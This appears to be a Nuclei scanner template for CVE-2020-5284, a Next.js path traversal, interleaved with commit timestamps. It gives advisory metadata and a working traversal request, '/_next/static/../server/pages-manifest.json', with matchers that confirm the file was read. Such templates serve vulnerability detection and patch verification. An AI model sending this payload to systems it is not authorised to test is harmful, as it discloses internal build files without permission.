2021-01-02 04:56:15 +00:00
id : CVE-2020-5284
2020-04-05 18:24:33 +00:00
info :
name : Next.js .next/ limited path traversal
2021-06-09 12:20:56 +00:00
author : rootxharsh,iamnoooob,dwisiswant0
2020-04-05 18:24:33 +00:00
severity : medium
2022-05-17 09:18:12 +00:00
description : Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
2021-03-21 06:41:45 +00:00
reference :
2022-04-22 10:38:41 +00:00
- https://github.com/zeit/next.js/releases/tag/v9.3.2 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
2022-05-17 09:18:12 +00:00
- https://github.com/zeit/next.js/releases/tag/v9.3.2
- https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-5284
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,nextjs,lfi
2020-04-05 18:24:33 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
2020-07-08 08:45:18 +00:00
matchers-condition : and
2020-04-05 18:24:33 +00:00
matchers :
- type : regex
regex :
- '\{"/_app":".*?_app\.js"'
2020-08-24 04:34:40 +00:00
part : body
- type : word
words :
- "application/json"
part : header
2020-04-05 18:24:33 +00:00
- type : status
status :
- 200